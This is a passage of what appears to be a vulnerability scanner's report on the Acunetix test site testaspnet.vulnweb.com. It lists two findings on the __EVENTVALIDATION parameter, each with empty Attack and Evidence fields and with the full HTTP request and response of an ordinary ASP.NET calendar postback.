it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8382&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBg%2Bpzc2ghkZGQwQ8uyvdgPKLn5O7d5YBiq2eIaqQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLno%2FYSAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEfM%2FWqblC0QhGeXV1zAVR67wK1LQ%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:44 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBg+pzc2ghkZGQwQ8uyvdgPKLn5O7d5YBiq2eIaqQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLno/YSAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEfM/WqblC0QhGeXV1zAVR67wK1LQ=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:White" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1065 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,065 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8369&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAAC02XS2ghkZGRUniTXuASzsrtU%2BC7gWkYo0yZkAA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLnpN2ZBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBPgsU7sd%2FSnPcmUdg9%2FbGbEk3je6
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:53 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAAAC02XS2ghkZGRUniTXuASzsrtU+C7gWkYo0yZkAA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLnpN2ZBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBPgsU7sd/SnPcmUdg9/bGbEk3je6" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:White" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their 